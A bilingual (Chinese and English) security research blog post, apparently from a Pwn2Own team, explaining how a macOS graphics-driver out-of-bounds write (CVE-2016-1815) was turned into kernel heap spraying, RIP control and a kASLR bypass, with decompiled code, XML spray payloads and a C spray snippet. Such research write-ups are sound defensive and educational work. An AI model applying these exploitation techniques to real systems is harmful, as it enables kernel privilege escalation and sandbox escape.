一个矩形pwn掉整个内核系列之一 – zone的舞蹈

一个矩形pwn掉整个内核系列之一 – zone的舞蹈

一个矩形pwn掉整个内核?这听起来很马德里不思议,然而这真实地发生在了今年3月份温哥华的Pwn2Own赛场。这一系列文章会向大家分享我们这次沙箱逃逸用到的Blitzard CVE-2016-1815的发现和利用经历。我们通过三步走最终完成了这个利用,本文将先问大家介绍第二和第三步 – kalloc.48的舞蹈kalloc.8192 重剑无锋,在最后一篇文章中,我们会回到本源,介绍这个漏洞的起因。

Take away

我们利用了一个vector的oob越界,通过精心的堆内存布局,将其转换为任意地址写但值受限的primitive,随后通过多次利用这个primitive实现infoleak来bypass KASLR和最终控制RIP。

IGVector::add函数

char __fastcall IGVector<rect_pair_t>::add(IGVector *this, rect_pair_t *a2)
{
  v3 =;
  if ( this->currentSize != this->capacity )
    goto LABEL_4;
  LOBYTE(v4) = IGVector<rect_pair_t>::grow(this, 2 * v3);
  if ( v4 )

LABEL_4:
    this->currentSize += 1;
    v5 =;
    *(this->storage +  32 * this->currentSize + 24) = a2->field_18; //rect2.len height 
    *(this->storage +  32 * this->currentSize + 16) = a2->field_10; //rect2.y x
    *(this->storage +  32 * this->currentSize + 8) = a2->field_8; //rect1.len height
    *(this->storage +  32 * this->currentSize) = a2->field_0;  //rect1.y x
  }
  return v4;

IGVector是一个在苹果Graphics驱动中使用很频繁的泛型模版类,它的头部是currentSize field, 后面紧跟一个capacity field,记录着当前vector的最大容量。这个field之后是storage指针,代表着这个vector的存储区域的堆地址。 rect_pair_t则是一个矩形对,每个矩形唯一表达了屏幕上的某个绘制区域,他的field如下所示:

  • int16 x
  • int16 y
  • int16 w
  • int16 h

x,y代表了矩形角的坐标,而同时w,h代表了矩形的宽度和高度,这四个元素就可以在坐标系中惟一确定一个矩形。最开始的时候这些矩形是以整形的形式存在的,但经历了一系列缩放和切分运算后,其变换成了IEEE.754的浮点数。这些浮点数相关的运算给我们逆向驱动带来了一些困难,因为IDA的F5插件基本无法很好地识别和组织SSE浮点指令。同时这也限制了我们的OOB写可以控制的内容。

在这个OOB发生的时候,内存的布局如下图所示: OOB内存快照 可以发现,IGVector::add函数调用发生在一个部分越界的48-size IGVector上。但这里sizefield被钉死在0xdeadbeefdeadbeef,是因为kalloc.48比cacheline的大小要小,所以在free之后一定会被zone allocator所染色。所幸capacitystorage这两个是我们可以想办法控制的。如果能满足以下条件,那么我们就有了一个跨越全部地址空间的任意地址写。

条件1条件2条件3

但这里仍然不是一个写任意值的primitive。如前文所述,矩形的fields以signed int16形式存在,也就是说在[-0x8000, 0x7ffff]的范围之内。当触发OOB的函数被调用的时候,他们已经被处理成了IEEE.754的浮点数,也就意味着我们只能用这个primitive去触发四次连续的两个值在范围[0x3…, 0x4…., 0xc…., 0xd…., 0xbf800000]的4字节内容(其中0xbf800000是-1的浮点数表达)写,最终写掉了32bytes的内存内容。

看起来这个不是什么好消息,但是这里我们需要先想办法把这个不太好的写先稳定化,然后再来介绍如何用这个写完成最终的利用。

控制zone kalloc.48

如上面的图所示,我们需要精确地控制溢出发生时对应的内存内容,否则就会产生bad access导致内核崩溃。不幸的是kalloc.48刚好是一个内核中比较活跃的zone,其中IOMachPort是最大的活跃分子。不言自明的是,IOMachPort的内存内容并不是我们可以控制的,也就是说我们需要避免其的干扰。

纵观历史,人们常用的内存布局方法是用io_open_service_extendedool_msg去布局kernel堆。但是它们有各自的优缺点: – ool_msg对堆的副作用小,但是头部0x18字节的内容是不可控的,而我们这个漏洞刚好是需要头部0x8字节的精确8字节控制 – io_open_service_extended会在kalloc.48中造成巨大的副作用,因为我们每次实现堆喷时都会造成一个新的IOMachPort被分配

我们在这里发现并使用了一个新的堆喷方法:IOCatalogueSendData. 如下面的代码片段所示。只需一个masterPort即可实施堆喷,堆副作用小,非常节能和环保 🙂

IOCatalogueSendData(
        mach_port_t     _masterPort,
        uint32_t                flag,
        const char             *buffer,
        uint32_t                size )
{
//...

    kr = io_catalog_send_data( masterPort, flag,
                            (char *) buffer, size, &result );
//...
    if ((masterPort != MACH_PORT_NULL) && (masterPort != _masterPort))
    mach_port_deallocate(mach_task_self(), masterPort);
//...
}

/* Routine io_catalog_send_data */
kern_return_t is_io_catalog_send_data(
        mach_port_t     master_port,
        uint32_t                flag,
        io_buf_ptr_t        inData,
        mach_msg_type_number_t  inDataCount,
        kern_return_t *     result)
{
//...
    if (inData) {
//...
        kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t)inData);
        data = CAST_DOWN(vm_offset_t, map_data);
     // must return success after vm_map_copyout() succeeds
        if( inDataCount ) {
            obj = (OSObject *)OSUnserializeXML((const char *)data, inDataCount);
//...
    switch ( flag ) {
//...

        case kIOCatalogAddDrivers: 
        case kIOCatalogAddDriversNoMatch: {
//...
                array = OSDynamicCast(OSArray, obj);
                if ( array ) {
                    if ( !gIOCatalogue->addDrivers( array , 
                                          flag == kIOCatalogAddDrivers) ) {
//...
            }
            break;
//...
}

bool IOCatalogue::addDrivers(
    OSArray * drivers,
    bool doNubMatching)
{
   //...
    while ( (object = iter->getNextObject()) ) {

        // xxx Deleted OSBundleModuleDemand check; will handle in other ways for SL

        OSDictionary * personality = OSDynamicCast(OSDictionary, object);
//...
        // Add driver personality to catalogue.
    OSArray * array = arrayForPersonality(personality);
    if (!array) addPersonality(personality);
    else
    {       
        count = array->getCount();
        while (count--) {
        OSDictionary * driver;

        // Be sure not to double up on personalities.
        driver = (OSDictionary *)array->getObject(count);
//...
        if (personality->isEqualTo(driver)) {
            break;
        }
        }
        if (count >= 0) {
        // its a dup
        continue;
        }
        result = array->setObject(personality);
//...
    set->setObject(personality);        
    }
//...
}

addDrivers函数接受满足以下条件的OSArray作为输入: – OSArray中包含了OSDictOSDict包含key IOProviderClassOSDict不能和已经存在于Catalogue的OSDict重复

我们可以以下面的XML格式去准备我们的布局payload,并通过IOCatalogueSendData(masterPort, 2, buf, 4096)去发送他们,想发送多少次就发送多少次 🙂

<array>
    <dict>
        <key>IOProviderClass</key>
        <string>ZZZZ</string>
        <key>ZZZZ</key>
        <array>
            <string>AAAAAAAAAAAAAAAAAAAAAA</string>
            <string>AAAAAAAAAAAAAAAAAAAAAB</string>
            ...
            <string>ZZZZZZZZZZZZZZZZZZZZZZ<string>
        </array>
    </dict>
</array>

有了这个方法之后,我们就有了在kalloc.48中玩耍的步骤了: – 喷射1个vm_map_copy和50个IOCatalogueSendData(内容我们完全可控)的组合,大小都是0x30 Step1 – 将1/3至2/3部分的ool_msg释放,在堆中挖坑 Step2 – 触发漏洞,让人掉坑里。 Step3 因为我们挖的坑足够多,堆的布局会趋向于稳定,有极大的概率满足我们的预期,允许我们实现稳定的和多次的任意地址写,完成三步走的第一步。

至于后面呢?

用一个float控制RIP

当我们有了一个稳定的write后,怎么去控制RIP?一个naive的想法是直接写掉userclient的虚表指针。但受漏洞本身写范围的限制,这是不可行的,如下图所示: wrong-overwrite 注意kernel中0xbf开头的地址空间是非法地址。

不过感谢x86中的mov指令并没有要求我们严格8字节对齐,事实上我们可以做一个4字节对齐的写,如下图所示: four-overwrite

看起来像那么回事了,但事情还没这么简单。在浩如烟海的userclient中,只有RootDomainUserClient的vtable指针地址高字节是0xffffff80,而其他的userclient vtable指针高地址都是在0xffffff7f,然而根据kASLR的特性kernel堆地址基本不可能占据这个区域。 那么去写掉RootDomainUserClient是否可行?

怎么喷的这么慢?

由于RootDomainUserClient大小比较小,我们需要喷射大量的该userclient来保证在某些预测的地址有比较大的概率userclient会布局在那。在实践的过程中我们发现喷射的速度随着userclient的个数增加而成二次方形式下降。我们调查了一些相关的代码,如下图所示: bt

bool IORegistryEntry::attachToParent( IORegistryEntry * parent,
1621                                 const IORegistryPlane * plane )
1622 {
1623     OSArray *  links;
1624     bool   ret;
1625     bool   needParent;
//...
1635     ret = makeLink( parent, kParentSetIndex, plane );
1636 
1637     if( (links = parent->getChildSetReference( plane )))
1638    needParent = (false == arrayMember( links, this ));
1639     else
1640    needParent = true;
1641 
//...
1669     if( needParent)
1670         ret &= parent->attachToChild( this, plane );
1671 
1672     return( ret );

我们可以看到arrayMember对已经attach的client做线性查找,如果你上过学的话就应该意识到这是个O(N^2)的复杂度。

后面的代码让这个复杂度变得更加高了。当userclient被打开之前,他们要先attach到对应的parent上,这会调用到parent->attachTochild

bool IORegistryEntry::attachToChild( IORegistryEntry * child,
1684                                         const IORegistryPlane * plane )
1685 {
1686     OSArray *  links;
//...
1694 
1695     ret = makeLink( child, kChildSetIndex, plane );
```

then

```
 bool IORegistryEntry::makeLink( IORegistryEntry * to,
1314                                 unsigned int relation,
1315                                 const IORegistryPlane * plane ) const
1316 {
1317     OSArray *  links;
1318     bool   result = false;
//...
1323    result = arrayMember( links, to );
1324    if( !result)
1325             result = links->setObject( to );
1326 
1327     } else {

这里links是一个OSArray,而setObject将新的userclient插入到了array存储中,然后调用了一个耗时的函数:

unsigned int OSArray::ensureCapacity(unsigned int newCapacity)
185 {
//...
203     newArray = (const OSMetaClassBase **) kalloc_container(newSize);
204     if (newArray) {
205         oldSize = sizeof(const OSMetaClassBase *) * capacity;
206 
207         OSCONTAINER_ACCUMSIZE(((size_t)newSize) - ((size_t)oldSize));
208 
209         bcopy(array, newArray, oldSize);
210         bzero(&newArray[capacity], newSize - oldSize);
211         kfree(array, oldSize);
212         array = newArray;

diagram

那么这一圈看下来的结论是,喷射userclient具有O(N^2)的时间复杂度,这强迫我们要选用大的userclient进行堆喷,因为今年的比赛机型MacBook用的是可以忽略的CoreM处理器,会让exploit跑得比蜗牛还慢,如果我们还吊死在RootDomainUserClient这一棵树上的话。

IGAccelVideoContext来救场了

我们基于以下条件继续搜寻可以用的userclient: – 必须能从沙箱中打开和调用 – 大小必须大于PAGESIZE,越大越好

占据两个PAGE的IGAccelVideoContext正是我们所要寻找的救世主. 基本上所有的IOAcceleratorFamily2 userclient都有一个service指针指向IntelAccelerator,对于IGAccelVideoContext来说,在0x528的位置。我们可以写掉这个堆地址的低4字节来将其指向我们可控的堆内容上,触发其中的virtual call。 heap-overwrite

RIP control

虽然说这里有虚函数调用,但是我们不能直接去调用service的虚函数,因为前面提到vm_map_copy布置的内容头部是不可控的。这里context_finish接口在service->mEventMachine上间接调用了虚函数,刚好满足了我们的需求。

__int64 __fastcall IOAccelContext2::context_finish(IOAccelContext2 *this)
{
  int v1; // eax@1
  unsigned int v2; // ecx@1

  v1 = this->service->mEventMachine->vt->__ZN24IOAccelEventMachineFast219finishEventUnlockedEP12IOAccelEvent(
         this->service->mEventMachine,

那么现在我们调整方向,去写掉任一个IGAccelVideoContextservice field. 在对具体的堆地址一无所知的情况下,我们只好继续喷喷喷。具体的步骤如下: – 喷 0x50,000 ool_msgs, 把堆推高到0xffffff80 bf800000 (地址B) – 把中间的释放掉,喷IGAccelVideoContext, 保证中间地址A 0xffffff80 62388000 被其占据 – 触发漏洞,写A - 4 + 0x528, 将service指针写成0xffffff80 bf800000 (地址B) – 调用这些喷的userclient的externalmethod,检查corruption

为什么我们选择了A和B这两个看似是magic number的地址?前面我们提到,我们只能写特定范围内的float,举个例子我们可以把0xffffff80 deadbeef 写成 0xffffff80 3xxxxxxx, 0xffffff80 4xxxxxxx, 0xffffff80 cxxxxxxx, 0xffffff80 dxxxxxxx and 0xffffff80 bf800000. 但这么多地址里,要么就太低(kslide每次启动的时候会变化,高slide会把堆基地址推高到0xffffff80 4xxxxxxx),要么就太高(内存不够,喷太费时)。所以最终我们选择写0xbf800000,取一半就是A.

这部分步骤如下代码所示:

mach_msg_size_t size = 0x2000;
mach_port_name_t my_port[0x500];
memset(my_port, 0, 0x500 * sizeof(mach_port_name_t));
char *buf = malloc(size);
memset(buf, 0x41, size);
*(unsigned long *)(buf - 0x18 + 0x1230) = 0xffffff8062388000 - 0xd0 + 2;
*(unsigned long *)(buf - 0x18 + 0x230) = 0xffffff8062388000 - 0xd0 + 2;

for (int i = 0; i < 0x500; i++) {
    *(unsigned int *)buf = i;
    printf("number %x success with %x.\n",i , send_msg(buf, size, &my_port[i]));
}
for (int i = 0x130; i < 0x250; i++)
{
    read_kern_data(my_port[i]);
}
printf("press enter to fill in IOSurface2.\n");
io_service_t serv = open_service("IOAccelerator");
io_connect_t *deviceConn2;
deviceConn2 = malloc(0x12000 * sizeof(io_connect_t));
kern_return_t kernResult;
for (int i =0; i < 0x12000; i ++)
{
    kernResult = IOServiceOpen(serv, mach_task_self(), 0x100, &deviceConn2[i]);
    printf("%x with result %x.\n", i , kernResult);
}

overwrite-1 这张图会看得更清楚些。

那么这事情到这就结束了?还远远没有。

头部还是中间?

聪明的读者可能前面就会有问题了,你喷的是0x2000,凭啥保证A刚好在你喷的userclient头?可能会在中间嘛。

对的,确实是这样。如果落在中间的话,我们需要写掉 A - 4 + 0x528A - 4 + 0x528 + 0x1000来保证覆盖到两种情况。

Bypassing kASLR

kASLR怎么过? 现在我们知道地址A被IGAccelVideoContext覆盖,地址B被我们喷的vm_map_copy覆盖。既然我们已经让指针指向假的布局的userclient了,有没有什么接口可以返回一个userclient中某段地址的内容? 通过搜寻发现了get_hw_steppings

“`

__int64 __fastcall IGAccelVideoContext::get_hw_steppings(IGAccelVideoContext *a1, _DWORD *a2)
{
  __int64 service; // rax@1

  service = a1->service;
  *a2 = *(_DWORD *)(service + 0x1140);
  a2[1] = *(_DWORD *)(service + 0x1144);
  a2[2] = *(_DWORD *)(service + 0x1148);
  a2[3] = *(_DWORD *)(service + 0x114C);
  a2[4] = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);
  return 0LL;
}

“`

注意这行

“`

a24 = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);

“` 回忆service+0x1288已经被我们所控制了,那么这就是一个完美的任意地址读的primitive。我们采取如下步骤: – 在B处填充vm_map_copy – 触发漏洞,覆盖service pointer指向B,意味着其指向了填充着0x4141414141414141的vm_map_copy(除了0x1288处设置为A-0xD0) – 调用get_hw_steppings来检测41414141,如果返回这个结果,那么这个userclient已经被我们修改了 – a24就返回了A地址的1个字节,重复以上步骤,读取全部内容

下图会让你理解得更清楚。 infoleak

又是头部还是中间

聪明的读者估计又会意识到,B可能也会掉落在vm_map_copy的中间,和A一样。 对于B的问题,和上文的解决方法一样,我们将0x1288和0x288都写成 A – 0xD0. 如果我们读的地方是 正常的IGAccelVideoContext 0x1000偏移处,那么根据其特性这里是0. middle

这意味着我们可以通过这个特征去区分头尾,最多两次尝试,如下图所示。 head tail 最终实现任意地址泄漏

总结

关于这个攻破的视频可以在http://v.qq.com/x/page/f0196p3g7vq.html 找到。

那么这个神奇的矩阵漏洞到底什么呢?利用都这么复杂了,漏洞究竟如何?请期待后续文章。如果等不急的话,请看我们在Blackhat USA上的PPT解馋 🙂

The Journey of a complete OSX privilege escalation with a single vulnerability – Part 1

The Journey of a complete OSX privilege escalation with a single vulnerability – Part 1

In previous blog posts Liang talked about the userspace privilege escalation vulnerability we found in WindowServer. Now in following articles I will talk about the Blitzard kernel bug we used in this year’s pwn2own to escape the Safari renderer sandbox, existing in the blit operation of graphics pipeline. From a exploiter’s prospective we took advantage of an vector out-of-bound access which under carefully prepared memory situations will lead to write-anywhere-but-value-restricted to achieve both infoleak and RIP control. In this article we will introduce the exploitation methods we played with mainly in kalloc.48 and kalloc.4096.

First we will first introduce the very function which the overflow occurs, what we can control and how these affect our following exploitation.

The IGVector add function

char __fastcall IGVector<rect_pair_t>::add(IGVector *this, rect_pair_t *a2)
{
  v3 =;
  if ( this->currentSize != this->capacity )
    goto LABEL_4;
  LOBYTE(v4) = IGVector<rect_pair_t>::grow(this, 2 * v3);
  if ( v4 )

LABEL_4:
    this->currentSize += 1;
    v5 =;
    *(this->storage +  32 * this->currentSize + 24) = a2->field_18; //rect2.len height 
    *(this->storage +  32 * this->currentSize + 16) = a2->field_10; //rect2.y x
    *(this->storage +  32 * this->currentSize + 8) = a2->field_8; //rect1.len height
    *(this->storage +  32 * this->currentSize) = a2->field_0;  //rect1.y x
  }
  return v4;

IGVector is a generic template collection class used frequently in Apple Graphics drivers. On the head of it lies the currentSize field. Right following the size we have a capacity denoting the current volume of the vector. storage pointer goes after capacity field, recording the actual location of heap objects. rect_pair_t holds a pair of rectangles, each rectangle corresponds to a drawing section on screen. The fields of rect is listed as follows:

  • int16 x
  • int16 y
  • int16 w
  • int16 h

x,y denote the coordinate of rect’s corner on screen, while w,h denote the width and height of rectangle. The four fields uniquely locates a rectangle on screen. The initial arguments of rectangle is passed in via integer format, however after a series of multiplication and division they become an IEEE.754 floating number in memory, which makes Hex-rays suffer a lot because it can hardly deal with SSE floating point instructions 🙁

When the overflow occurs, the memory layout is shown as the following figure.

igvec-48

As the figure shows, the add function is called on a partially out-of-bound 48-size block. The size field is fixed to 0xdeadbeefdeadbeef, because kalloc.48 is smaller than cache-line size, thus it will always be poisoned after freed. Good news is both capacity and storage pointer is under our control. This means we have a write-anywhere primitive covering the whole address space, by carefully preparing content satisfying the following equation, let

definition

then

addr-calc

and also

non-equal

However we have a write-anywhere but it’s not a write-anything primitive. The rectangles initially have their fields in signed int16 format, falling in range [-0x8000, 0x7fff]. As the function is called, they have already been transformed to IEEE.754 representation in memory, which implies we can only use it to write two continously 4-byte value in range [0x3…, 0x4…., 0xc…, 0xd…, 0xbf800000] (0xbf800000 is float representation of -1) four times, corrupting 32 bytes of memory.

Control the kalloc.48 zone

We need to precisely prepare controlled value right after the overflowed vector, otherwise the kernel will crash on a bad access. Unfortunately kalloc.48 is a zone used frequently in kernel with IOMachPort acting as the most commonly seen object and we must get rid of it. Previous work mainly comes up with io_open_service_extended and ool_msg to prepare the kernel heap. But problem arises for our situation: – ool_msg has small heap side-effect, but the head 0x18 bytes is not controllable while we need precise 8 bytes control at head 0x8 position – io_open_service_extended has massive side effect in kalloc.48 zone by producing an IOMachPort in every opened spraying connection – in each io_open_service_extended call at most 37 items can be passed in kernel to occupy some space, which is constrained by the maximum properties count per IOServiceConnection can hold

Thus we’re presenting a new spray technique: IOCatalogueSendData shown in following code snippet. Only one master_port is needed for continuously spraying, really energy-saving and earth friendly 🙂

IOCatalogueSendData(
        mach_port_t     _masterPort,
        uint32_t                flag,
        const char             *buffer,
        uint32_t                size )
{
//...

    kr = io_catalog_send_data( masterPort, flag,
                            (char *) buffer, size, &result );
//...
    if ((masterPort != MACH_PORT_NULL) && (masterPort != _masterPort))
    mach_port_deallocate(mach_task_self(), masterPort);
//...
}

/* Routine io_catalog_send_data */
kern_return_t is_io_catalog_send_data(
        mach_port_t     master_port,
        uint32_t                flag,
        io_buf_ptr_t        inData,
        mach_msg_type_number_t  inDataCount,
        kern_return_t *     result)
{
//...
    if (inData) {
//...
        kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t)inData);
        data = CAST_DOWN(vm_offset_t, map_data);
     // must return success after vm_map_copyout() succeeds
        if( inDataCount ) {
            obj = (OSObject *)OSUnserializeXML((const char *)data, inDataCount);
//...
    switch ( flag ) {
//...

        case kIOCatalogAddDrivers: 
        case kIOCatalogAddDriversNoMatch: {
//...
                array = OSDynamicCast(OSArray, obj);
                if ( array ) {
                    if ( !gIOCatalogue->addDrivers( array , 
                                          flag == kIOCatalogAddDrivers) ) {
//...
            }
            break;
//...
}

bool IOCatalogue::addDrivers(
    OSArray * drivers,
    bool doNubMatching)
{
   //...
    while ( (object = iter->getNextObject()) ) {

        // xxx Deleted OSBundleModuleDemand check; will handle in other ways for SL

        OSDictionary * personality = OSDynamicCast(OSDictionary, object);
//...
        // Add driver personality to catalogue.
    OSArray * array = arrayForPersonality(personality);
    if (!array) addPersonality(personality);
    else
    {       
        count = array->getCount();
        while (count--) {
        OSDictionary * driver;

        // Be sure not to double up on personalities.
        driver = (OSDictionary *)array->getObject(count);
//...
        if (personality->isEqualTo(driver)) {
            break;
        }
        }
        if (count >= 0) {
        // its a dup
        continue;
        }
        result = array->setObject(personality);
//...
    set->setObject(personality);        
    }
//...
}

The addDrivers functions accepts an OSArray with the following easy-to-meet conditions: – OSArray contains an OSDict – OSDict has key IOProviderClass – OSDict must not be exactly same as any other pre-exists OSDict in Catalogue

We can prepare our sprayed content in the array part as the following sample XML shows, and slightly changes one char per spray to satisfy condition 3. Also OSString accepts all bytes except null byte, which can also be avoided. The spray goes as we call IOCatalogueSendData(masterPort, 2, buf, 4096} as many times as we wish.

<array>
    <dict>
        <key>IOProviderClass</key>
        <string>ZZZZ</string>
        <key>ZZZZ</key>
        <array>
            <string>AAAAAAAAAAAAAAAAAAAAAA</string>
            <string>AAAAAAAAAAAAAAAAAAAAAB</string>
            ...
            <string>ZZZZZZZZZZZZZZZZZZZZZZ<string>
        </array>
    </dict>
</array>

So we have this following steps to play in kalloc.48 to achieve a stable write-anywhere: – Spray lots of combination of 1 ool_msg and 50 IOCatalogueSendData (content of which totally controllable) (both of size 0x30), pushing allocations to continuous region.

kalloc-48-1

  • free ool_msg at 1/3 to 2/3 part, leaving holes in allocation as shown below.

kalloc-48-2

  • trigger vulnerable function, vulnerable allocation will fall in hole we previously left, as shown below.

kalloc-48-3

In a nearly 100% chance the heap will layout as the previous figure, which exactly match what we expected. Spraying 50 or more 0x30 sized controllable content in one roll can reduce the possibility of some other irrelevant 0x30 content produced by other kernel activities such as IOMachPort to accidentally be just placed after free block occupied in, also enabling us to do a double-write, or triple-write, which we found crucial in following exploitation steps.

Write a float to control RIP

After we have made the write itself stable, we move forward to turn the write into actual RIP control and/or infoleak. The first idea that will pop up is to overwrite some vtable pointer at the head of some userclients. Seems at first hand this vulnerability is not a very good write primitive because we will certainly corrupt the poor userclient, as shown in the following figure:

bad-overwrite

In OSX kernel addresses starting with high byte at 0xbf is almost impossible (or you can just say impossible) to be occupied or prepared for some content. But we are also unable to adjust the value we write to start with 0xffffff80 to point the address to a heap location we can control due to the nature of Blitzard.

But thanks to Intel CPUs, we can make a qword write at an unaligned location, i.e. 4byte offset.

align-write

This looks reasonable but we found the stability is not promising. This is because in the huge family of userclients, it seems only RootDomainUserClient has a virtual table pointer high bytes of which is 0xffffff80. Other userclient friends all have vtable pointer address 4th byte of which is 0x7f. Address spaces starting with 0xffffff7f00000000 are usually occupied by non-writable sections so it’s not possible to manipulate memory here to gain some degree of memory control, while on the other hand, address spaces high bytes of which are 0xffffff80 expose some possibility to contain heap regions.

Decreasing spray speed? Why?

But RootDomainUserClient is a small userclient and we need to spray lots of them to guarantee that at begining of a particular PAGE there’s good chance the RootDomainUserClient falls there. However quickly we found out the spray speed decreases obviously as the number of userclient increases. After some investigation we found out the root cause of this issue, check the following code snippet.

backtrace

bool IORegistryEntry::attachToParent( IORegistryEntry * parent,
1621                                 const IORegistryPlane * plane )
1622 {
1623     OSArray *  links;
1624     bool   ret;
1625     bool   needParent;
//...
1635     ret = makeLink( parent, kParentSetIndex, plane );
1636 
1637     if( (links = parent->getChildSetReference( plane )))
1638    needParent = (false == arrayMember( links, this ));
1639     else
1640    needParent = true;
1641 
//...
1669     if( needParent)
1670         ret &= parent->attachToChild( this, plane );
1671 
1672     return( ret );

Here arrayMember performs a linear search on existing attached client, which already implies a O(N^2) time complexity.

Can things be worse? Let’s go further. When userclients are opened, they need to be attached to their parent. This will in turn call parent->attachToChild

bool IORegistryEntry::attachToChild( IORegistryEntry * child,
1684                                         const IORegistryPlane * plane )
1685 {
1686     OSArray *  links;
//...
1694 
1695     ret = makeLink( child, kChildSetIndex, plane );

then

bool IORegistryEntry::makeLink( IORegistryEntry * to,
1314                                 unsigned int relation,
1315                                 const IORegistryPlane * plane ) const
1316 {
1317     OSArray *  links;
1318     bool   result = false;
//...
1323    result = arrayMember( links, to );
1324    if( !result)
1325             result = links->setObject( to );
1326 
1327     } else {

The links is an OSArray, and setObject inserts new userclient into the array storage, which calls into this expensive function

unsigned int OSArray::ensureCapacity(unsigned int newCapacity)

185 {
//...
203     newArray = (const OSMetaClassBase **) kalloc_container(newSize);
204     if (newArray) {
205         oldSize = sizeof(const OSMetaClassBase *) * capacity;
206 
207         OSCONTAINER_ACCUMSIZE(((size_t)newSize) - ((size_t)oldSize));
208 
209         bcopy(array, newArray, oldSize);
210         bzero(&newArray[capacity], newSize - oldSize);
211         kfree(array, oldSize);
212         array = newArray;

spray-time

So in a conclusion, the spraying time has a N^2 time complexity relationship with opened userclient per service. This may not be a big problem for powerful Macbook Pros, but we found the Core M processor in the new Macbook (which is unfortunately the machine we need to exploit in Pwn2Own competition) as slow as grandma, which forces us to found better and faster ways. Fortunately, a new method pops up and we solved RIP control and info leak problems in one shot. That’s perfect.

IGAccelVideoContext comes to rescue

As we searches for helpful userclients, the following criterias must be met: – It must be reachable from sandbox – Size of userclient must be larger than PAGE_SIZE, and bigger is better (faster spray speed)

We have to admit directly overwriting vtable pointers is not a good solution for our vulnerability. Can we overwrite some field pointers of userclient? The answer is yes. IGAccelVideoContext is a perfect candidate with size 0x2000. Nearly all IOAcceleratorFamily2 userclients have a service pointer associated, and it point to the mother IntelAccelerator. In the following figure we can see at offset 0x528 we saw the appearance of this pointer. It’s a heap location which means we can use the previous mentioned so-called slide-writing to overwrite only lower 4bytes to make it point to heap memory we can control.

service-ptr

RIP control

Further study reveals there are virtual function calls on this pointer. But we need to take extra caution as we cannot directly call the fake service‘s virtual function, because the header of vm_map_copy is not controllable. So we take another approach as we found out context_finish function does an indirect call on service->mEventMachine,

__int64 __fastcall IOAccelContext2::context_finish(IOAccelContext2 *this)
{
  int v1; // eax@1
  unsigned int v2; // ecx@1

  v1 = this->service->mEventMachine->vt->__ZN24IOAccelEventMachineFast219finishEventUnlockedEP12IOAccelEvent(
         this->service->mEventMachine,

We now adjust our goal to overwrite the service field of any IGAccelVideoContext. Given no knowledge of heap addresses, we again need to spray lots of userclients to achieve our goal. After trial and errors we finally took the following steps: – Spray 0x50,000 ool_msgs, pushing heap covering 0xffffff80 bf800000 (B) with controlled content (ool) – free middle parts of ool, fill with IGAccelVideoContext covering 0xffffff80 62388000 (A) – Perform write at A - 4 + 0x528 descending, change service pointer to 0xffffff80 bf800000 (`B) – Call each IGAccelVideoContext’s externalMethod and detect corruption

Why we choose the particular addresses A and B? As we recall in previous paragraphs, we can only write float in particular ranges to an expected location, which means we can change pointers like 0xffffff80 deadbeef to 0xffffff80 3xxxxxxx, 0xffffff80 4xxxxxxx, 0xffffff80 cxxxxxxx, 0xffffff80 dxxxxxxx and 0xffffff80 bf800000. These addresses are either too low (kASLR changes in each boot and high kASLR value may shift heap location very high, flooding 0xffffff80 4xxxxxxx), or too high (need lots of spray time to reach). So we choose to write 0xbf800000 to some pointers and taking half from B lead to A.

This code snippet shows how to do the previous mentioned steps:

mach_msg_size_t size = 0x2000;
mach_port_name_t my_port[0x500];
memset(my_port, 0, 0x500 * sizeof(mach_port_name_t));
char *buf = malloc(size);
memset(buf, 0x41, size);
*(unsigned long *)(buf - 0x18 + 0x1230) = 0xffffff8062388000 - 0xd0 + 2;
*(unsigned long *)(buf - 0x18 + 0x230) = 0xffffff8062388000 - 0xd0 + 2;

for (int i = 0; i < 0x500; i++) {
    *(unsigned int *)buf = i;
    printf("number %x success with %x.\n",i , send_msg(buf, size, &my_port[i]));
}
for (int i = 0x130; i < 0x250; i++)
{
    read_kern_data(my_port[i]);
}
printf("press enter to fill in IOSurface2.\n");
io_service_t serv = open_service("IOAccelerator");
io_connect_t *deviceConn2;
deviceConn2 = malloc(0x12000 * sizeof(io_connect_t));
kern_return_t kernResult;
for (int i =0; i < 0x12000; i ++)
{
    kernResult = IOServiceOpen(serv, mach_task_self(), 0x100, &deviceConn2[i]);
    printf("%x with result %x.\n", i , kernResult);
}

You will be more clear with this figure.

change-service-field

Head or middle?

Smart readers may have noticed a critical problem. Given the size of userclient is 0x2000, how can you be sure that head of the userclient falles right at A? Why can not A falls at middle of the IGAccelVideoContext.

Yes you’re right. It’s a 50-50 chance. If A falls at middle of userclient, overwriting A - 4 + 0x528 will corrupt nothing meaningful, lead to failure of exploitation. Can we let this happen? Absolutely not. We need to trigger the write twice, to write both at A - 4 + 0x528 and A - 4 + 0x528 + 0x1000.

So you can now understand why I mentioned earlier we may need to do a double-write in kalloc.48. By changing the value of sprayed content in IOCatalogueSendData in a odd-even style, and triggering the vulnerability multiple times, we can ensure that there’s a nearly 100% chance that both two locations will be overwritten.

Bypassing kASLR

We know Steve Jobs (or Tim Cook?) will not make our life so easy as we still have a big obstacle to overcome: the Royal kASLR, even we have already figured out a way to control RIP. But when there’s a will, there is a way. Let’s revisit what we have. we have known address A covered with IGAccelVideoContext. Known address B covered with vm_map_copy content controlled and we can also change the content as we wish, just freeing and refill the ool_msgs. Are there any function of some userclients that will return a particular content at a specified address, given we now control the whole body of the fake userclient?

With a bit of luck the externalMethod function get_hw_steppings caught our attention.

__int64 __fastcall IGAccelVideoContext::get_hw_steppings(IGAccelVideoContext *a1, _DWORD *a2)
{
  __int64 service; // rax@1

  service = a1->service;
  *a2 = *(_DWORD *)(service + 0x1140);
  a2[1] = *(_DWORD *)(service + 0x1144);
  a2[2] = *(_DWORD *)(service + 0x1148);
  a2[3] = *(_DWORD *)(service + 0x114C);
  a2[4] = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);
  return 0LL;
}

Eureka!

a24 = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);

